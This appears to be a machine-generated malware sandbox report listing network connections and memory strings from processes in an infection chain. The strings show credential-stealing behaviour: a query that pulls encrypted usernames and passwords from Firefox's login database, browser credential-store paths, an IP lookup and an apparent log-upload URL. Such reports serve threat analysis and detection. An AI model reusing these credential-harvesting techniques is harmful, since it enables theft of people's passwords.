Source: unknown TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: unknown TCP traffic detected without corresponding DNS query: 185.140.53.71
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe Code function: 13_2_0101A09A recv, 13_2_0101A09A
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.dr String found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.dr String found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: vbc.exe, 0000000F.00000003.518065717.000000000094E000.00000004.00000001.sdmp String found in binary or memory: dataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736938632;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: vbc.exe, 0000000F.00000003.518065717.000000000094E000.00000004.00000001.sdmp String found in binary or memory: dataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736938632;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: tmpFB21.tmp.exe String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: vbc.exe, 0000000F.00000003.517790333.000000000094C000.00000004.00000001.sdmp String found in binary or memory: s://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlabout:blankhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://go.microsoft.com/fwlink/?LinkId=517287https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=7&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=199&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=348&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=2&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/res://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736938632;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736938632;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2
Source: vbc.exe, 0000000F.00000003.517790333.000000000094C000.00000004.00000001.sdmp String found in binary or memory: s://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlabout:blankhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://go.microsoft.com/fwlink/?LinkId=517287https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=7&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=199&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=348&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=2&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/res://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736938632;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736938632;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2
Source: unknown DNS traffic detected: queries for: ia601504.us.archive.org
Source: wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmp String found in binary or memory: http://certificates.godaddy.com/repository/0
Source: wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmp String found in binary or memory: http://certificates.godaddy.com/repository/gdig2.crt0
Source: wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmp String found in binary or memory: http://certs.godaddy.com/repository/1301
Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, tmpFB21.tmp.exe.2.dr String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
Source: wscript.exe, 00000000.00000003.340516433.000001B8665AF000.00000004.00000001.sdmp String found in binary or memory: http://crl.g
Source: tmp87E4.tmp.exe, 0000000C.00000002.610844081.000000000506F000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmp String found in binary or memory: http://crl.godaddy.com/gdig2s1-1597.crl0
Source: wscript.exe, 00000000.00000003.339839120.000001B8665BF000.00000004.00000001.sdmp String found in binary or memory: http://crl.godaddy.com/gdroot-g2.crl0=w
Source: wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmp String found in binary or memory: http://crl.godaddy.com/gdroot-g2.crl0F
Source: wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmp String found in binary or memory: http://crl.godaddy.com/gdroot.crl0F
Source: tmp87E4.tmp.exe, 0000000C.00000002.610746899.0000000005046000.00000004.00000001.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: 77EC63BDA74BD0D0E0426DC8F8008506.12.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: tmpFB21.tmp.exe, 0000000D.00000003.493276632.0000000005AA3000.00000004.00000001.sdmp String found in binary or memory: http://fontfabrik.com;
Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, tmpFB21.tmp.exe.2.dr String found in binary or memory: http://ocsp.comodoca.com0
Source: wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.godaddy.com/0
Source: wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.godaddy.com/02
Source: wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.godaddy.com/05
Source: tmp87E4.tmp.exe, 0000000C.00000002.601243946.0000000002AF1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: tmpFB21.tmp.exe String found in binary or memory: http://whatismyipaddress.com/
Source: pgr.exe, 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, tmpFB21.tmp.exe.2.dr String found in binary or memory: http://whatismyipaddress.com/-
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: tmpFB21.tmp.exe, 0000000D.00000003.495103820.0000000005AA3000.00000004.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000003.495080605.0000000005AB2000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.com
Source: tmpFB21.tmp.exe, 0000000D.00000003.495080605.0000000005AB2000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.com-E
Source: tmpFB21.tmp.exe, 0000000D.00000003.495080605.0000000005AB2000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.com;
Source: tmpFB21.tmp.exe, 0000000D.00000003.495103820.0000000005AA3000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.comMP_
Source: tmpFB21.tmp.exe, 0000000D.00000003.495103820.0000000005AA3000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.comafet6
Source: tmpFB21.tmp.exe, 0000000D.00000003.495080605.0000000005AB2000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.comal
Source: tmpFB21.tmp.exe, 0000000D.00000003.495080605.0000000005AB2000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.comfacb
Source: tmpFB21.tmp.exe, 0000000D.00000003.495080605.0000000005AB2000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.comhly#
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: tmpFB21.tmp.exe, 0000000D.00000003.496944356.0000000005AB3000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comF
Source: tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comTTFd
Source: tmpFB21.tmp.exe, 0000000D.00000003.501081618.0000000005AA5000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.coma
Source: tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comalic
Source: tmpFB21.tmp.exe, 0000000D.00000003.501081618.0000000005AA5000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comcomF
Source: tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comd
Source: tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comdG
Source: tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comdi
Source: tmpFB21.tmp.exe, 0000000D.00000003.496944356.0000000005AB3000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comdita
Source: tmpFB21.tmp.exe, 0000000D.00000003.497421413.0000000005AB4000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comessed8
Source: tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comitu
Source: tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comsief
Source: tmpFB21.tmp.exe, 0000000D.00000003.497421413.0000000005AB4000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comtua
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: tmpFB21.tmp.exe, 0000000D.00000003.494270722.0000000005AA3000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn)
Source: tmpFB21.tmp.exe, 0000000D.00000003.494591560.0000000005AA2000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/S
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: tmpFB21.tmp.exe, 0000000D.00000003.494270722.0000000005AA3000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cnlw
Source: tmpFB21.tmp.exe, 0000000D.00000003.494270722.0000000005AA3000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cnm
Source: tmpFB21.tmp.exe, 0000000D.00000003.494270722.0000000005AA3000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cnu
Source: tmpFB21.tmp.exe, 0000000D.00000003.498837679.0000000005AB6000.00000004.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: tmpFB21.tmp.exe, 0000000D.00000003.498837679.0000000005AB6000.00000004.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmQK
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: tmpFB21.tmp.exe, 0000000D.00000003.495838585.0000000005AAB000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: tmpFB21.tmp.exe, 0000000D.00000003.495725552.0000000005AA5000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/3
Source: tmpFB21.tmp.exe, 0000000D.00000003.496375592.0000000005AAC000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/8
Source: tmpFB21.tmp.exe, 0000000D.00000003.496076219.0000000005AAC000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/96
Source: tmpFB21.tmp.exe, 0000000D.00000003.495725552.0000000005AA5000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/G
Source: tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/L
Source: tmpFB21.tmp.exe, 0000000D.00000003.496375592.0000000005AAC000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0et
Source: tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/arge
Source: tmpFB21.tmp.exe, 0000000D.00000003.495725552.0000000005AA5000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/het
Source: tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/i
Source: tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000003.496375592.0000000005AAC000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/3
Source: tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/G
Source: tmpFB21.tmp.exe, 0000000D.00000003.496375592.0000000005AAC000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/i
Source: tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/r
Source: tmpFB21.tmp.exe, 0000000D.00000003.495838585.0000000005AAB000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/r
Source: tmpFB21.tmp.exe, 0000000D.00000003.495725552.0000000005AA5000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/udi
Source: tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/uild
Source: tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/vno8
Source: tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/wab
Source: tmpFB21.tmp.exe, 0000000D.00000003.500377718.0000000005ADD000.00000004.00000001.sdmp String found in binary or memory: http://www.monotype.
Source: vbc.exe, 0000000F.00000003.517790333.000000000094C000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.co
Source: tmpFB21.tmp.exe.2.dr String found in binary or memory: http://www.nirsoft.net/
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: tmpFB21.tmp.exe, 0000000D.00000002.609034784.0000000003021000.00000004.00000001.sdmp String found in binary or memory: http://www.site.com/logs.php
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmp String found in binary or memory: http://www.urwpp.de
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: vbc.exe, 0000000F.00000003.517667198.000000000210C000.00000004.00000001.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activi
Source: vbc.exe, 0000000F.00000003.517790333.000000000094C000.00000004.00000001.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=30055406629
Source: vbc.exe, 0000000F.00000003.518065717.000000000094E000.00000004.00000001.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736
Source: wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmp String found in binary or memory: https://certs.godaddy.com/repository/0
Source: vbc.exe, 0000000F.00000003.517790333.000000000094C000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: vbc.exe, 0000000F.00000003.517790333.000000000094C000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&
Source: vbc.exe, 0000000F.00000003.517790333.000000000094C000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://c
Source: wscript.exe, 00000000.00000003.339775838.000001B866587000.00000004.00000001.sdmp String found in binary or memory: https://ia601504.us.archive.org/
